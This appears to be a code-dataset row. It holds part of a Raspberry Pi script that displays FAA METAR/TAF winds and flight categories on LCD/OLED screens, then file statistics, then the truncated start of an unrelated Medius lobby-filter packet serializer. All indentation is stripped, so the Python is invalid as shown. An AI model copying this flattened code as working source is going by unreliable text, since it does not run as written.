sky_cvr = sky_condition.attrib['sky_cover'] #get the sky cover (BKN, OVC, SCT, etc)
logger.debug(sky_cvr)
if sky_cvr in ("OVC","BKN","OVX"): #If the layer is OVC, BKN or OVX, set Flight category based on height A$
try:
cld_base_ft_agl = sky_condition.attrib['cloud_base_ft_agl'] #get cloud base AGL from XML
logger.debug(cld_base_ft_agl) #debug
except:
cld_base_ft_agl = forecast.find('vert_vis_ft').text #get cloud base AGL from XML
# cld_base_ft_agl = sky_condition.attrib['cloud_base_ft_agl'] #get cloud base AGL from XML
# logger.debug(cld_base_ft_agl)
cld_base_ft_agl = int(cld_base_ft_agl)
if cld_base_ft_agl < 500:
flightcategory = "LIFR"
break
elif 500 <= cld_base_ft_agl < 1000:
flightcategory = "IFR"
break
elif 1000 <= cld_base_ft_agl <= 3000:
flightcategory = "MVFR"
break
elif cld_base_ft_agl > 3000:
flightcategory = "VFR"
break
#visibilty can also set flight category. If the clouds haven't set the fltcat to LIFR. See if visibility will
if flightcategory != "LIFR": #if it's LIFR due to cloud layer, no reason to check any other things that can set fl$
if forecast.find('visibility_statute_mi') is not None: #check XML if visibility value exists
visibility_statute_mi = forecast.find('visibility_statute_mi').text #get visibility number
visibility_statute_mi = float(visibility_statute_mi)
print (visibility_statute_mi)
if visibility_statute_mi < 1.0:
flightcategory = "LIFR"
elif 1.0 <= visibility_statute_mi < 3.0:
flightcategory = "IFR"
elif 3.0 <= visibility_statute_mi <= 5.0 and flightcategory != "IFR": #if Flight Category was already
flightcategory = "MVFR"
#Print out TAF data to screen for debugging only
logger.debug('Airport - ' + stationId)
logger.debug('Flight Category - ' + flightcategory)
logger.debug('Wind Speed - ' + taf_wind_speed_kt)
logger.debug('WX String - ' + taf_wx_string)
logger.debug('Change Indicator - ' + taf_change_indicator)
logger.debug('Wind Director Degrees - ' + taf_wind_dir_degrees)
logger.debug('Wind Gust - ' + taf_wind_gust_kt)
#grab flightcategory from returned FAA data
if flightcategory is None: #if wind speed is blank, then bypass
flightcategory = None
#grab wind speeds from returned FAA data
if taf_wind_speed_kt is None: #if wind speed is blank, then bypass
windspeedkt = 0
else:
windspeedkt = int(taf_wind_speed_kt)
#grab wind gust from returned FAA data - Lance Blank
if taf_wind_gust_kt is None or taf_wind_gust_kt == '': #if wind speed is blank, then bypass
windgustkt = 0
else:
windgustkt = int(taf_wind_gust_kt)
#grab wind direction from returned FAA data
if taf_wind_dir_degrees is None: #if wind direction is blank, then bypass
winddirdegree = 0
else:
winddirdegree = int(taf_wind_dir_degrees)
#grab Weather info from returned FAA data
if taf_wx_string is None: #if weather string is blank, then bypass
wxstring = "NONE"
else:
wxstring = taf_wx_string
#Check for duplicate airport identifier and skip if found, otherwise store in dictionary. covers for dups in "airports" file
if stationId in stationiddict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
stationiddict[stationId] = flightcategory #build category dictionary
if stationId in windsdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
windsdict[stationId] = windspeedkt #build windspeed dictionary
if stationId in wnddirdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wnddirdict[stationId] = winddirdegree #build wind direction dictionary
if stationId in wxstringdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wxstringdict[stationId] = wxstring #build weather dictionary
if stationId in wndgustdict: #Lance Blank
logger.info(stationId + "Duplicate, only saved the first winds")
else:
wndgustdict[stationId] = windgustkt #build windgust dictionary
logger.info("Decoded TAF Data for Display")
elif metar_taf_mos == 1: #Decode METARs to display
#grab the airport category, wind speed and various weather from the results given from FAA.
#start of METAR decode routine if 'metar_taf' equals 1. Script will default to this routine without a rotary switch installed.
for metar in root.iter('METAR'):
stationId = metar.find('station_id').text
#grab flight category from returned FAA data
if metar.find('flight_category') is None: #if category is blank, then bypass
flightcategory = "NONE"
else:
flightcategory = metar.find('flight_category').text
#grab wind speeds from returned FAA data
if metar.find('wind_speed_kt') is None: #if wind speed is blank, then bypass
windspeedkt = 0
else:
windspeedkt = int(metar.find('wind_speed_kt').text)
#grab wind gust from returned FAA data - Lance Blank
if metar.find('wind_gust_kt') is None: #if wind speed is blank, then bypass
windgustkt = 0
else:
windgustkt = int(metar.find('wind_gust_kt').text)
#grab wind direction from returned FAA data
if metar.find('wind_dir_degrees') is None: #if wind speed is blank, then bypass
winddirdegree = 0
else:
winddirdegree = int(metar.find('wind_dir_degrees').text)
#grab Weather info from returned FAA data
if metar.find('wx_string') is None: #if weather string is blank, then bypass
wxstring = "NONE"
else:
wxstring = metar.find('wx_string').text
#Check for duplicate airport identifier and skip if found, otherwise store in dictionary. covers for dups in "airports" file
if stationId in stationiddict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
stationiddict[stationId] = flightcategory #build category dictionary
if stationId in windsdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
windsdict[stationId] = windspeedkt #build windspeed dictionary
if stationId in wnddirdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wnddirdict[stationId] = winddirdegree #build wind direction dictionary
if stationId in wxstringdict:
logger.info(stationId + " Duplicate, only saved first metar category")
else:
wxstringdict[stationId] = wxstring #build weather dictionary
if stationId in wndgustdict: #Lance - Thanks
print ("Duplicate, only saved the first winds")
else:
wndgustdict[stationId] = windgustkt #build windgust dictionary
logger.info("Decoded METAR Data for Display")
#Grab the top X number of highwinds and put them in a sorted list from highest to lowest to display
if exclusive_flag == 1:
num2display = config.LED_COUNT #Reset num2display to all the airports if we are using exclusive_list
newwindsdict = dict(sorted(iter(windsdict.items()), key=operator.itemgetter(1), reverse=True)[:num2display])
sortwindslist = sorted(list(newwindsdict.items()), key=operator.itemgetter(1))
sortwindslist.reverse()
if sortwindslist == []:
sortwindslist = [(' ',0)] #Used when Heat Map is selected
if exclusive_flag == 1: #check if we should include an exclusive subset of airports to display
logger.debug(sortwindslist)
tmp1 = sorted(i for i in sortwindslist if i[0] in exclusive_list)
tmp1.sort(key=lambda tup: tup[1]) #sort by wind value
tmp1.reverse() #Reverse so list is sorted highest to lowest
if len(tmp1) < numofdisplays: #Pad blanks if airports are less than numofdisplays
blank = [('', '')] * (numofdisplays - len(tmp1))
tmp1 = tmp1 + blank
sortwindslist = tmp1 #Reset sortwindslist to only those whose winds are higher than specified
hiap, hiwind = sortwindslist[0] #Get the highest wind speed airport identifier and its wind speed.
if abovekts == 1: #check if we should only display airports whose winds are higher or equal to value in minwinds
logger.debug(sortwindslist)
tmp1 = sorted(i for i in sortwindslist if i[1] != '') #filter out blank screens that would throw an error when compared to minwinds
logger.debug(tmp1)
tmp1 = sorted(i for i in tmp1 if i[1] >= minwinds) #sortwindslist if i[1] >= minwinds)
tmp1.sort(key=lambda tup: tup[1]) #sort by wind value
tmp1.reverse() #Reverse so list is sorted highest to lowest
if len(tmp1) <= 0: #If there are no airports with winds higher than set add comment to string
if lcddisplay: #different comments depending on display used
tmp1 = [("All Airports"," Lower Than " + str(minwinds))]
else:
tmp1 = [("Winds","Calm")]
if len(tmp1) < numofdisplays: #Pad blanks if airports are less than numofdisplays
blank = [('','')] * (numofdisplays - len(tmp1))
tmp1 = tmp1 + blank
sortwindslist = tmp1 #Reset sortwindslist to only those whose winds are higher than specified
if blankscr: #Add a blank screen to separate the group of airports displayed
sortwindslist.append(tuple(('','')))
#Force the list to be at least as long as the number of displays.
if len(sortwindslist) < numofdisplays: #Pad blanks if airports are less than numofdisplays
blank = [('','')] * (numofdisplays - len(sortwindslist))
sortwindslist = sortwindslist + blank
logger.debug(len(sortwindslist))
logger.debug(sortwindslist)
logger.info("Built Wind Dictionary")
#See http://www.circuitbasics.com/raspberry-pi-lcd-set-up-and-programming-in-python/
#Find the top windspeeds and airports and display to LCD if used. Written for a 16x2 display wired in 4 bit format.
if lcddisplay:
logger.info("LCD Display Being Used")
#Bit maps for 8 special characters, Arrows, to display wind direction along with wind speed.
#See https://rplcd.readthedocs.io/en/stable/usage.html#creating-custom-characters for more info on creating characters.
swarrow = (
0b00000,
0b01111,
0b00011,
0b00101,
0b01001,
0b10000,
0b00000,
0b00000
)
nwarrow = (
0b00000,
0b00000,
0b10000,
0b01001,
0b00101,
0b00011,
0b01111,
0b00000
)
nearrow = (
0b00000,
0b00000,
0b00001,
0b10010,
0b10100,
0b11000,
0b11110,
0b00000
)
searrow = (
0b00000,
0b11110,
0b11000,
0b10100,
0b10010,
0b00001,
0b00000,
0b00000
)
northarrow = (
0b00000,
0b00100,
0b00100,
0b00100,
0b10101,
0b01110,
0b00100,
0b00000
)
eastarrow = (
0b00000,
0b00000,
0b00100,
0b01000,
0b11111,
0b01000,
0b00100,
0b00000
)
southarrow = (
0b00000,
0b00100,
0b01110,
0b10101,
0b00100,
0b00100,
0b00100,
0b00000
)
westarrow = (
0b00000,
0b00000,
0b00100,
0b00010,
0b11111,
0b00010,
0b00100,
0b00000
)
long_string = "Winds Updated " + dt_string + "--"
#Build the instance of LCD. Be sure to include "compat_mode = True" to eliminate extraneous characters on the display.
lcd = CharLCD(numbering_mode=GPIO.BCM, cols=16, rows=2, pin_rs=26, pin_e=19, pins_data=[13, 6, 5 ,11], compat_mode = True)
lcd.clear()
lcd.cursor_mode = 'hide'
#Create special Characters using bitmaps above. See https://rplcd.readthedocs.io/en/stable/usage.html#creating-custom-characters
lcd.create_char(0,swarrow)
lcd.create_char(1,nwarrow)
lcd.create_char(2,nearrow)
lcd.create_char(3,searrow)
lcd.create_char(4,northarrow)
lcd.create_char(5,eastarrow)
lcd.create_char(6,southarrow)
lcd.create_char(7,westarrow)
for ap,wnd in sortwindslist: #airport and winds
dir = wnddirdict.get(ap) #get wind direction by airport
arrowdir = winddir(dir) #get proper proper arrow to display
#Determine wind direction and assign proper arrow direction
if arrowdir == 'd': #From North
arrow = '\x04'
elif arrowdir == 'f': #From North East
arrow = '\x02'
elif arrowdir == 'b': #From East
arrow = '\x05'
elif arrowdir == 'e': #From South East
arrow = '\x03'
elif arrowdir == 'c': #From South
arrow = '\x06'
elif arrowdir == 'g': #From South West
arrow = '\x00'
elif arrowdir == 'a': #From West
arrow = '\x07'
elif arrowdir == 'h': #From North West
arrow = '\x01'
else:
arrow = '' #No arrow returned
if ap != '': #check to see if there is an airport to display
long_string = long_string + ap + ":" + str(wnd) + "kts " + arrow + " "
logger.debug(long_string)
if abovekts: #check to see if we should only display airports whose winds are higher than 'minwinds'
framebuffer = [str(minwinds) + ' kts or Above','']
else:
framebuffer = [str(num2display) + ' Highest Winds','']
#OLED Display
if oledused:
logger.info("OLED Displays Used")
#Reference material; https://pillow.readthedocs.io/en/stable/reference
#Initialize library.
for j in range(numofdisplays):
tca_select(j) #select display to write to
disp.begin()
disp.display()
#Create blank image for drawing.
width = disp.width
height = disp.height
image = Image.new('1', (width, height)) #Make sure to create image with mode '1' for 1-bit color.
#Get drawing object to draw on image.
draw = ImageDraw.Draw(image)
#Load fonts. Install font package --> sudo apt-get install ttf-mscorefonts-installer
#Also see; https://stackoverflow.com/questions/1970807/center-middle-align-text-with-pil for info
#Arrows.ttf downloaded from https://www.1001fonts.com/arrows-font.html#styles
boldfont = ImageFont.truetype('/usr/share/fonts/truetype/liberation/LiberationSerif-Bold.ttf', fontsize, fontindex)
regfont = ImageFont.truetype('/usr/share/fonts/truetype/liberation/LiberationSerif-Regular.ttf', fontsize, fontindex)
arrows = ImageFont.truetype('/usr/share/fonts/truetype/misc/Arrows.ttf', fontsize, fontindex)
logger.info("Fonts Loaded")
font = regfont #initialize font to start
temp = 0 #Used to toggle invert if set
toggle = 0 #Used to toggle invert between groups of airports. Leave set at 0
#Add update message to beginning of list
sortwindslist.insert(0,("Updated", dt_string))
#Add type of data being displayed, METAR, TAF, MOS etc
if metar_taf_mos == 1: #Displaying METAR data
sortwindslist.insert(0,("METARs", "Displayed"))
elif metar_taf_mos == 0: #TAF hour_to_display
if toggle_sw == 0:
sortwindslist.insert(0,(str(time_sw0) + " hr TAF", "Displayed"))
if toggle_sw == 1:
sortwindslist.insert(0,(str(time_sw1) + " hr TAF", "Displayed"))
if toggle_sw == 2:
sortwindslist.insert(0,(str(time_sw2) + " hr TAF", "Displayed"))
if toggle_sw == 3:
sortwindslist.insert(0,(str(time_sw3) + " hr TAF", "Displayed"))
if toggle_sw == 4:
sortwindslist.insert(0,(str(time_sw4) + " hr TAF", "Displayed"))
if toggle_sw == 5:
sortwindslist.insert(0,(str(time_sw5) + " hr TAF", "Displayed"))
if toggle_sw == 6:
sortwindslist.insert(0,(str(time_sw6) + " hr TAF", "Displayed"))
if toggle_sw == 7:
sortwindslist.insert(0,(str(time_sw7) + " hr TAF", "Displayed"))
if toggle_sw == 8:
sortwindslist.insert(0,(str(time_sw8) + " hr TAF", "Displayed"))
if toggle_sw == 9:
sortwindslist.insert(0,(str(time_sw9) + " hr TAF", "Displayed"))
if toggle_sw == 10:
sortwindslist.insert(0,(str(time_sw10) + " hr TAF", "Displayed"))
if toggle_sw == 11:
sortwindslist.insert(0,(str(time_sw11) + " hr TAF", "Displayed"))
if toggle_sw == 12:
sortwindslist.insert(0,(str(time_sw0) + " hr TAF", "Displayed"))
elif metar_taf_mos == 2: #MOS hour_to_display
if toggle_sw == 0:
sortwindslist.insert(0,(str(time_sw0) + " hr MOS", "Displayed"))
if toggle_sw == 1:
sortwindslist.insert(0,(str(time_sw1) + " hr MOS", "Displayed"))
if toggle_sw == 2:
sortwindslist.insert(0,(str(time_sw2) + " hr MOS", "Displayed"))
if toggle_sw == 3:
sortwindslist.insert(0,(str(time_sw3) + " hr MOS", "Displayed"))
if toggle_sw == 4:
sortwindslist.insert(0,(str(time_sw4) + " hr MOS", "Displayed"))
if toggle_sw == 5:
sortwindslist.insert(0,(str(time_sw5) + " hr MOS", "Displayed"))
if toggle_sw == 6:
sortwindslist.insert(0,(str(time_sw6) + " hr MOS", "Displayed"))
if toggle_sw == 7:
sortwindslist.insert(0,(str(time_sw7) + " hr MOS", "Displayed"))
if toggle_sw == 8:
sortwindslist.insert(0,(str(time_sw8) + " hr MOS", "Displayed"))
if toggle_sw == 9:
sortwindslist.insert(0,(str(time_sw9) + " hr MOS", "Displayed"))
if toggle_sw == 10:
sortwindslist.insert(0,(str(time_sw10) + " hr MOS", "Displayed"))
if toggle_sw == 11:
sortwindslist.insert(0,(str(time_sw11) + " hr MOS", "Displayed"))
if toggle_sw == 12:
sortwindslist.insert(0,(str(time_sw0) + " hr MOS", "Displayed"))
#Display welcome message via OLED displays if 'usewelcome = 1'
if usewelcome and toggle_sw != -1: #if toggle_sw == -1 then this script just started. Suppress welcome message for now
logger.info("Use Welcome Enabled")
if oledposorder == 0:
startnum = 0 #values are for oleds wired normally, pos 0 thru 7
stopnum = numofdisplays
stepnum = 1
else:
startnum = numofdisplays-1 #these values are for oleds wired backwards, pos 7 thru 0
stopnum = -1
stepnum = -1
font = boldfont
arrowdir = '' #No arrow needed
j = 0
welcomelist = list(welcome.split(" ")) #create a list to use to display a welcome message if desired
if displayIP: #will display the RPI's local IP address along with welcome message if desired.
splitIP = re.sub(r'^(.*?(\..*?){1})\.', r'\1\n.', str(s.getsockname()[0])) #split IP into 2 lines
logger.debug(splitIP)
welcomelist = welcomelist + [splitIP] #[splitIP] #split into 2 lines
# welcomelist = welcomelist + [str(s.getsockname()[0])] #all on one line
if len(welcomelist) < numofdisplays:
pad = int((numofdisplays - len(welcomelist))/2)
welcomelist = ([''] * pad) + welcomelist
blanks = [''] * numofdisplays #add blanks to end of message to clean display after message
welcomelist = welcomelist + blanks
if GPIO.input(4) == 1: #Set dimming level
dimming = 1 #1 = full dim
else:
dimming = dimswitch #Brightess setting. dimswitch can be 0,1 or 2. 1 is most dim, 2 medium dim.
logger.debug(welcomelist)
while j < len(welcomelist):
for ch in range(startnum, stopnum, stepnum):
if j < len(welcomelist):
word = welcomelist[j]
else:
word = ''
oledcenter(word, ch, font, arrowdir, dimming, toggle, 0)
if numofdisplays == 1:
time.sleep(oledpause)
else:
time.sleep(oledpause/4)
j += 1
#Loop through the airports and display the winds till its time to update the weather from the FAA
#Setup timed loop for updating FAA Weather that will run based on the value of update_interval which is a user setting
k = 0 #counter for displaying local time is desired.
if toggle_sw != -1: #check to see if this is the first time through and bypass if it is.
if oledused:
clearoleddisplays()
if lcddisplay:
lcd.clear()
timeout_start = time.time() #When timer hits user-defined value, go back to outer loop to update FAA Weather.
while time.time() < timeout_start + (update_interval * 60): #take "update_interval" which is in minutes and turn into seconds
#If the rotary switch is in Heat Map Mode, display such on the displays.
if metar_taf_mos == 3:
if lcddisplay:
lcd.clear()
lcd.cursor_mode = 'hide'
loop_string("Heat Map Mode", lcd, framebuffer, 1, 16, lcdpause)
if oledused: #Display top AP Landings list on oleds
arrowdir = ''
dimming = 0
toggle = 0
j = 0
ch = 0
logger.debug(hmdata_sorted)
while j < 10:
for ch in range(startnum, stopnum, stepnum): #numofdisplays-1, -1, -1):
if j == 0:
val = hmdata_sorted[j]
elif j > 10:
val = ''
else:
hmap, numland = hmdata_sorted[j]
val = hmap + "\n" + '#' + str(j)
oledcenter(val, ch, font, arrowdir, dimming, toggle, 0) #send airport and winds to proper oled display
j += 1
if numofdisplays == 1:
time.sleep(oledpause)
else:
time.sleep(oledpause/4)
#Routine to restart this script if config.py is changed while this script is running.
for f, mtime in WATCHED_FILES_MTIMES:
if getmtime(f) != mtime:
logger.info("Restarting from awake" + __file__ + " in 2 sec...")
time.sleep(2)
os.execv(sys.executable, [sys.executable] + [__file__]) #'/NeoSectional/metar-display-v4.py'
#Timer routine, used to turn off LED's at night if desired. Use 24 hour time in settings.
if usetimer: #check to see if the user wants to use a timer.
if time_in_range(timeoff, end_time, datetime.now().time()): #Part of Timer Fix - Thank You to Matthew G
# If temporary lights-on period from refresh button has expired, restore the original light schedule
#Part of Timer Fix
if temp_lights_on == 1:
end_time = lights_on
timeoff = lights_out
temp_lights_on = 0
logger.info("Display Going to Sleep")
if lcddisplay:
lcd.clear()
if oledused:
tmp1 = border
border = 0
clearoleddisplays() #clear displays with no borders
border = tmp1
while time_in_range(timeoff, end_time, datetime.now().time()): #Part of timer fix
# sys.stdout.write ("z")
# sys.stdout.flush ()
if sleepmsg == 1: #Display "Sleeping" message on first oled if desired. 0 = No, 1 = Yes
rch = random.randint(0,numofdisplays-1)
oledcenter("Sleeping", rch, font, "", 1, toggle) #send airport and winds to proper oled display
time.sleep(2)
clearoleddisplays()
temp_timeoff = timeoff #store original timeoff time and restore later.
time.sleep(1)
if GPIO.input(22) == False: #Pushbutton for Refresh. check to see if we should turn on temporarily during sleep mo$
# Set to turn lights on two seconds ago to make sure we hit the loop next time through - Part of Timer Fix
end_time = (datetime.now()-timedelta(seconds=2)).time()
timeoff = (datetime.now()+timedelta(minutes=tempsleepon)).time()
temp_lights_on = 1 #Set this to 1 if button is pressed
logger.info("Sleep interrupted by button push")
#Routine to restart this script if config.py is changed while this script is running.
for f, mtime in WATCHED_FILES_MTIMES:
if getmtime(f) != mtime:
logger.info("Restarting from sleep " + __file__ + " in 2 sec...")
time.sleep(2)
os.execv(sys.executable, [sys.executable] + [__file__]) #'/NeoSectional/metar-display-v4.py'
# print ("\033[0;0m\n") #Turn off Purple text.
#Check if rotary switch is used, and what position it is in. This will determine what to display, METAR or TAF data.
#If TAF data, what time offset should be displayed, i.e. 0 hour, 1 hour, 2 hour etc.
#If there is no rotary switch installed, then all these tests will fail and will display the defaulted data from Switch Position 0
if GPIO.input(0) == False and toggle_sw != 0:
toggle_sw = 0
hour_to_display = time_sw0 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw0 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 0. Breaking out of loop for METARs')
break
elif GPIO.input(5) == False and toggle_sw != 1:
toggle_sw = 1
hour_to_display = time_sw1 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw1 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 1. Breaking out of loop for TAF/MOS + ' + str(time_sw1) + " hour")
break
elif GPIO.input(6) == False and toggle_sw != 2:
toggle_sw = 2
hour_to_display = time_sw2 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw2 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 2. Breaking out of loop for TAF/MOS + ' + str(time_sw2) + " hours")
break
elif GPIO.input(13) == False and toggle_sw != 3:
toggle_sw = 3
hour_to_display = time_sw3 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw3 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 3. Breaking out of loop for TAF/MOS + ' + str(time_sw3) + " hours")
break
elif GPIO.input(19) == False and toggle_sw != 4:
toggle_sw = 4
hour_to_display = time_sw4 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw4 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 4. Breaking out of loop for TAF/MOS + ' + str(time_sw4) + " hours")
break
elif GPIO.input(26) == False and toggle_sw != 5:
toggle_sw = 5
hour_to_display = time_sw5 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw5 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 5. Breaking out of loop for TAF/MOS + ' + str(time_sw5) + " hours")
break
elif GPIO.input(21) == False and toggle_sw != 6:
toggle_sw = 6
hour_to_display = time_sw6 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw6 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 6. Breaking out of loop for TAF/MOS + ' + str(time_sw6) + " hours")
break
elif GPIO.input(20) == False and toggle_sw != 7:
toggle_sw = 7
hour_to_display = time_sw7 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw7 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 7. Breaking out of loop for TAF/MOS + ' + str(time_sw7) + " hours")
break
elif GPIO.input(16) == False and toggle_sw != 8:
toggle_sw = 8
hour_to_display = time_sw8 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw8 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 8. Breaking out of loop for TAF/MOS + ' + str(time_sw8) + " hours")
break
elif GPIO.input(12) == False and toggle_sw != 9:
toggle_sw = 9
hour_to_display = time_sw9 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw9 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 9. Breaking out of loop for TAF/MOS + ' + str(time_sw9) + " hours")
break
elif GPIO.input(1) == False and toggle_sw != 10:
toggle_sw = 10
hour_to_display = time_sw10 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw10 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 10. Breaking out of loop for TAF/MOS + ' + str(time_sw10) + " hours")
break
elif GPIO.input(7) == False and toggle_sw != 11:
toggle_sw = 11
hour_to_display = time_sw11 #Offset in HOURS to choose which TAF/MOS to display. Not used with Metars/Heat Map
metar_taf_mos = data_sw11 #0 = Display TAF. 1 = Display METAR. 2 = MOS. 3 = Heat Map
logger.info('Switch in position 11. Breaking out of loop for TAF/MOS + ' + str(time_sw11) + " hours")
break
elif toggle_sw == -1: #Used if no Rotary Switch is installed
toggle_sw = 12 #12 designates that no Rotary Switch is installed
hour_to_display = time_sw0 #Value set above in default position 0
metar_taf_mos = data_sw0 #Value set above in default position 0
logger.info('Rotary Switch Not Installed. Using Switch Position 0 as Default')
break
#Check to see if pushbutton is pressed to force an update of FAA Weather
#If no button is connected, then this is bypassed and will only update when 'update_interval' is met
if GPIO.input(22) == False:
logger.info('Breaking out of loop to refresh FAA Data')
break
#Bright light will provide a low state (0) on GPIO. Dark light will provide a high state (1).
#Full brightness will be used if no light sensor is installed. IC238 Light Sensor.
if GPIO.input(4) == 1:
dimming = 1 #1 = full dim
else:
dimming = dimswitch #Brightess setting. dimswitch can be 0,1 or 2. 1 is most dim, 2 medium dim.
if lcddisplay:
print ("Display on a LCD display")
#Below creates a scrolling effect of the X highest winds, updated every 15 minutes (update_interval)
lcd.clear()
lcd.cursor_mode = 'hide'
loop_string(long_string, lcd, framebuffer, 1, 16, lcdpause)
#Display information via OLED
if oledused and metar_taf_mos != 3 and toggle_sw != -1:
logger.debug("Display on a OLED display") #debug
if temp == len(sortwindslist)-1: #Check to see if display should be inverted after each group of airports
if toginv:
toggle = not(toggle)
temp = 0
else:
temp += 1
if invert: #If invert is set to 1 then display black text on white background
toggle = 1
for ch in range(startnum, stopnum, stepnum): #numofdisplays-1, -1, -1):
ap,wnd = sortwindslist[ch] #Grab airport and its winds to display
dir = wnddirdict.get(ap) #get wind direction by airport
gust = wndgustdict.get(ap) #get wind gust by airport - Mez
if dir == None:
dir = 361
logger.debug(str(ch) + ' ' + str(ap) + ' ' + str(dir) + ' ' + str(wnd) + ' ' + str(gust) + ' ' + str(dir)) #debug
val = ap + "\n" + str(wnd) #Provide a starting value that will get modified by oledcenter function
if ap == hiap and boldhiap: #Highlight the airport with the highest winds in bold text.
font = boldfont
else:
font = regfont
oledcenter(val, ch, font, dir, dimming, toggle, 0) #send airport and winds to proper oled display
#shift list 1 position then redisplay. Creates scrolling effect.
if scrolldis: #Determine if display should scroll right=1 or left=0
sortwindslist = (sortwindslist[-1:] + sortwindslist[:-1]) #From; https://www.geeksforgeeks.org/python-program-right-rotate-list-n/
else:
sortwindslist = (sortwindslist[1:] + sortwindslist[:1])
time.sleep(oledpause) #pause between scroll effect
if k == len(sortwindslist)-1 and displaytime: #Display current and zulu time if displaytime = 1
now = datetime.now()
zulu = datetime.utcnow()
localtime = now.strftime("%I:%M %p\n Local") #12:00 PM format
zulutime = zulu.strftime("%H:%M\n Zulu") #12:00 PM format
pos = int((numofdisplays-3)/2) #Calculate position to display the time. Needs 3 screens minimum.
logger.debug(localtime) #debug
logger.debug(zulutime) #debug
arrowdir = '' #No Arrow needed
clearoleddisplays() #clear displays
if numofdisplays % 2 == 0: #Check if we have a odd or even num of displays
pass
else:
oledcenter('Current\nTime', pos, font, arrowdir, dimming, toggle) #send Current Time to proper oled display
if numofdisplays < 2: #Check to see if there is only 1 oled and pause between screens if there is.
time.sleep(oledpause)
oledcenter(localtime, pos+1, font, arrowdir, dimming, toggle) #send Local Time to proper oled display
if numofdisplays < 2: #Check to see if there is only 1 oled and pause between screens if there is.
time.sleep(oledpause)
oledcenter(zulutime, pos+2, font, arrowdir, dimming, toggle) #send Zulu Time to proper oled display
k = 0
if numofdisplays < 2:
time.sleep(oledpause)
else:
time.sleep(oledpause*2) #long pause
else:
k = k + 1
| 52.55492 | 216 | 0.568535 | 11,577 | 91,866 | 4.442429 | 0.119547 | 0.014875 | 0.0091 | 0.011627 | 0.356679 | 0.310364 | 0.287886 | 0.273245 | 0.251799 | 0.219094 | 0 | 0.034168 | 0.347223 | 91,866 | 1,747 | 217 | 52.585003 | 0.823456 | 0.374654 | 0 | 0.361983 | 0 | 0.001653 | 0.083552 | 0.004906 | 0 | 0 | 0.000635 | 0 | 0 | 1 | 0.009917 | false | 0.006612 | 0.023141 | 0 | 0.043802 | 0.003306 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7ef3b38bf0a4fe8c9b6a5cce63d0f9ae7988497 | 1,311 | py | Python | src/medius/mediuspackets/setlobbyworldfilter.py | Metroynome/robo | 78c389decce98d0d1e4e4e02ccbfcba7b465209c | [
"MIT"
] | 8 | 2021-07-14T16:55:04.000Z | 2022-03-07T22:03:03.000Z | src/medius/mediuspackets/setlobbyworldfilter.py | Metroynome/robo | 78c389decce98d0d1e4e4e02ccbfcba7b465209c | [
"MIT"
] | 22 | 2021-07-13T02:17:00.000Z | 2022-02-13T03:26:52.000Z | src/medius/mediuspackets/setlobbyworldfilter.py | Metroynome/robo | 78c389decce98d0d1e4e4e02ccbfcba7b465209c | [
"MIT"
] | 5 | 2021-07-30T05:49:09.000Z | 2022-02-14T18:02:07.000Z | from enums.enums import MediusEnum, CallbackStatus
from utils import utils
from medius.mediuspackets.setlobbyworldfilterresponse import SetLobbyWorldFilterResponseSerializer
class SetLobbyWorldFilterSerializer:
data_dict = [
{'name': 'mediusid', 'n_bytes': 2, 'cast': None},
{'name': 'message_id', 'n_bytes': MediusEnum.MESSAGEID_MAXLEN, 'cast': None},
{'name': 'buf', 'n_bytes': 3, 'cast': None},
{'name': 'filter1', 'n_bytes': 4, 'cast': None},
{'name': 'filter2', 'n_bytes': 4, 'cast': None},
{'name': 'filter3', 'n_bytes': 4, 'cast': None},
{'name': 'filter4', 'n_bytes': 4, 'cast': None},
{'name': 'lobby_filter_type', 'n_bytes': 4, 'cast': None},
{'name': 'lobby_filter_mask_level_type', 'n_bytes': 4, 'cast': None}
]
class SetLobbyWorldFilterHandler:
def process(self, serialized, monolith, con):
return [SetLobbyWorldFilterResponseSerializer.build(
